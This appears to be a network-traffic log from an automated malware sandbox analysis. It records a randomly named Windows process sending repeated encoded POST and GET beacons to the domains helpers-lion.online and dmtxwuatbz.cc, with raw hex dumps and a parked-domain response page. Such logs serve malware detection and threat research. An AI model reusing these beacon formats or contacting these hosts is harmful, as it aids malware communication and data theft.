66 75 71 30 46 78 63 4f 51 3d 3d Data Ascii: _Z1XhZu=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6Jatdxi+CB2172pWZssIvp97pVuOMBWZ0/4r1Pfuq0FxcOQ==
Aug 9, 2024 08:43:33.338969946 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 09 Aug 2024 06:43:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 9, 2024 08:43:33.339040041 CEST	224	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1
Aug 9, 2024 08:43:33.339078903 CEST	1236	IN	Data Raw: 41 0b fd 4f f2 21 56 b4 13 3f 80 6c bb 58 08 16 91 dc 16 94 e9 a4 05 c8 7d d8 31 d3 0a 8a a1 b4 e0 1d fc 7f 40 6b cc 82 2b 34 90 7c c2 5a 60 5f 86 96 e2 ef a0 16 b4 fd e1 d7 fb 6f cc 4d d6 60 30 1e b4 da 3f 25 9f a7 66 bd c7 d6 4c 97 c9 24 b4 13 Data Ascii: AO!V?lX}1@k+4\|Z`_oM`0?%fL$?Br8!D(<a~agp#$!%@uyL:\|dt4SW \-YNG."5ly4(6iF2<$
Aug 9, 2024 08:43:33.339160919 CEST	1126	IN	Data Raw: f9 be 12 f7 14 b8 59 a8 8a e9 46 d4 3e 50 38 9a f3 56 a6 3a 5f 3f 32 f5 75 32 16 ee 39 5a 4e 67 ee 38 9b 32 10 74 33 10 e2 ea 15 77 e0 a3 01 2e a2 cc df 8d 54 30 5e 53 2e d8 df 0f ce b9 6e 45 94 65 59 54 a7 67 23 29 36 fc 00 f2 d2 18 0e fa 9f 58 Data Ascii: YF>P8V:_?2u29ZNg82t3w.T0^S.nEeYTg#)6Xtz(9~\|I&]ysR^-WELo1[r\%rC5GTI?c}uSr46\`GL,vk"cWA`^F7i%}*ejW<P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49759	194.58.112.174	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:35.172642946 CEST	1837	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 58 75 75 34 6b 5a 49 6b 55 46 51 61 31 45 6e 54 4f 34 50 32 67 4b 76 4c 48 67 6c 4f 4a 54 67 4f 57 62 62 49 44 58 56 58 55 76 71 37 54 38 44 5a 48 61 38 52 78 57 54 5a 30 4d 36 67 50 4e 45 6e 5a 5a 52 4d 45 63 4c 4a 6c 4c 79 57 68 6c 35 6b 62 6f 6f 5a 4e 45 67 4f 55 39 6e 75 72 42 67 6d 4c 4d 50 46 6f 57 78 59 49 44 70 68 38 72 74 49 51 73 7a 31 62 6c 6f 68 67 33 56 37 66 75 58 48 67 56 48 53 50 4e 74 72 37 30 6e 37 48 76 65 4c 7a 47 68 52 37 53 32 73 62 59 6f 33 4c 48 4e 45 [TRUNCATED] Data Ascii: _Z1XhZu=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYXuu4kZIkUFQa1EnTO4P2gKvLHglOJTgOWbbIDXVXUvq7T8DZHa8RxWTZ0M6gPNEnZZRMEcLJlLyWhl5kbooZNEgOU9nurBgmLMPFoWxYIDph8rtIQsz1blohg3V7fuXHgVHSPNtr70n7HveLzGhR7S2sbYo3LHNEoTvnIhmc/NoSTygHRyiqqlJVSs1uyzye9rC/ZYry34pa5gYNH9a0pcMHgG7ZY3iI519ybQTROALsbtzaVixyOEIeGRdRmvbGCZCb0OFFqKpBx+G26pSPqk5zQEmEdNwuj0oXZJf8YGM7MjGvVwc6dym89ZOjJ9RTPQvOH3rERFr+b8ZbykDnPefF4+iCEBy1zxwKV5rpIYz4+RwLi1+tSKwvc3yC4WQAHf+DNAc1km8E/TdnHWXNDKr7er6pp+cZZ7m8k5vG7SMv0kTlCrln3qrBT8+5rldRzj7oQDky28nLnrGcgIg+YWtREbjLoMH4amn9ILxbPsJGH9b3tmYRj9qFmLdOGZc3rQCYJP1a0DL/Gj+aiy38c5MKW0AEbtGUmkCvttxtuvV9szT4baSV9Blz6M7YEX4hJJtclZ1Nb8OGaqGe9xTGL3Gf2s9NhfVQ5343wSDGwSVrMWAHXQaCK3PCYBZq82uXRIdcdWHBrFTMFd9nkuqcNUO0svhmwWbCVmiYbEX1QyYiTmk9faGLB0HT680NGadI9Ocyx0Mu0GjHGqAC4dgc3cD3eOuqYKO1sXt0pKuhKzKc7Tvk9age/M1Dpc1mHJ7L5MLy4TNJVHEmPHIi6PTPaRuLmE3FJ9lKYG5bJwEwlqi1mEw35ZoP9xD1mq9H0OAWIx [TRUNCATED]
Aug 9, 2024 08:43:35.884445906 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 09 Aug 2024 06:43:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 9, 2024 08:43:35.884470940 CEST	1236	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
Aug 9, 2024 08:43:35.884501934 CEST	1236	IN	Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce Data Ascii: xDOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?7YF>P8V
Aug 9, 2024 08:43:35.884516001 CEST	114	IN	Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49760	194.58.112.174	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:37.703871965 CEST	526	OUT	GET /mooq/?f6Gp=VzB4OR5&_Z1XhZu=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmsErbGh+kSxw/T3vF3DtlH4gUPM1PULOdKyAjMPLmXyfHmQWdLU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.helpers-lion.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:43:38.454294920 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 09 Aug 2024 06:43:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED] Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://r [TRUNCATED]
Aug 9, 2024 08:43:38.454405069 CEST	1236	IN	Data Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h1><p class="b-parki
Aug 9, 2024 08:43:38.454421043 CEST	1236	IN	Data Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
Aug 9, 2024 08:43:38.454436064 CEST	1236	IN	Data Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
Aug 9, 2024 08:43:38.454449892 CEST	1236	IN	Data Raw: 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f Data Ascii: -lion.online&utm_medium=parking&utm_campaign=s_land_server&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
Aug 9, 2024 08:43:38.454467058 CEST	1236	IN	Data Raw: 26 6e 62 73 70 3b d0 bd d0 b5 d1 81 d0 ba d0 be d0 bb d1 8c d0 ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 Data Ascii:   .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.on
Aug 9, 2024 08:43:38.454546928 CEST	1236	IN	Data Raw: 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b8 26 6e 62 73 70 3b d0 be d0 b1 d0 b5 d0 b7 d0 be d0 bf d0 b0 d1 81 d1 8c d1 82 d0 b5 20 d0 b2 d0 b0 d1 88 20 d0 bf d1 80 d0 be d0 b5 d0 ba d1 82 20 d0 be d1 82 26 6e Data Ascii: SSL-    ! ,
Aug 9, 2024 08:43:38.454564095 CEST	1236	IN	Data Raw: 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 73 63 72 69 70 74 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 61 72 6b 69 6e 67 2e 72 65 67 2e 72 75 2f 73 63 72 69 70 74 2f 67 65 74 5f 64 6f 6d 61 Data Ascii: ByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><s
Aug 9, 2024 08:43:38.454581022 CEST	909	IN	Data Raw: 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 33 38 30 39 30 39 2d 32 35 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e Data Ascii: c="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49762	172.67.210.102	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:43.683851957 CEST	782	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 67 6f 76 6e 64 69 34 52 4e 56 64 38 2b 67 70 6c 45 78 55 33 49 65 77 6c 36 53 30 65 69 45 6b 59 69 70 6c 69 68 2f 6d 73 5a 4a 4d Data Ascii: _Z1XhZu=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDgovndi4RNVd8+gplExU3Iewl6S0eiEkYiplih/msZJM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49763	172.67.210.102	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:46.221484900 CEST	806	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 2b 79 6c 34 4b 47 65 43 45 4f 61 69 52 6c 77 32 7a 42 6a 74 73 76 49 45 69 38 6a 4e 79 46 57 4e 70 46 78 76 4a 48 55 7a 67 6d 61 51 3d 3d Data Ascii: _Z1XhZu=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY+yl4KGeCEOaiRlw2zBjtsvIEi8jNyFWNpFxvJHUzgmaQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49764	172.67.210.102	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:43:48.750865936 CEST	1819	OUT	POST /lfkn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.dmtxwuatbz.cc Origin: http://www.dmtxwuatbz.cc Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.dmtxwuatbz.cc/lfkn/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 